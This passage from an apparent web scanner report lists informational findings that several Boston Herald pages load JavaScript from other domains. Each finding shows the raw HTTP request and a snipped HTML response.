Cookie: bhfont=12; OAX=rcHW801DO8kADVvc; bhpopup=on; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.5.10.1296251844; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __utmb=1.2.10.1296251844; ebNewBandWidth_.www.bostonherald.com=1856%3A1296251858097

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.697. http://www.bostonherald.com/news/us_politics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/us_politics/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /news/us_politics/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:47:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 56235

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.698. http://www.bostonherald.com/photobox/index.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/photobox/index.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

Response

18.699. http://www.bostonherald.com/projects/boston_pensions/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/boston_pensions/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /projects/boston_pensions/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

18.700. http://www.bostonherald.com/projects/bra/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/bra/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /projects/bra/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 68209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // special_projects/ge
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.701. http://www.bostonherald.com/projects/buybacks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/buybacks/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://cache.heraldinteractive.com/js/tab_control.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /projects/buybacks/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<!-- // special_projects/payro
...[SNIP]...
</script>

<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

18.702. http://www.bostonherald.com/projects/consultants/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/consultants/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://cache.heraldinteractive.com/js/tab_control.js

Request

GET /projects/consultants/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:04:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 22660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Mass Pike Consultant Datab
...[SNIP]...
</script>

<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
...[SNIP]...

18.703. http://www.bostonherald.com/projects/edic/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/edic/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /projects/edic/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 97885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // special_projects/ge
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.704. http://www.bostonherald.com/projects/lawyer_pay/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/lawyer_pay/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /projects/lawyer_pay/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 36347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // special_projects/ge
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.705. http://www.bostonherald.com/projects/mcas2009 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/mcas2009

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

Response

18.706. http://www.bostonherald.com/projects/mta2008/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/mta2008/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /projects/mta2008/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:48 GMT
Server: Apache
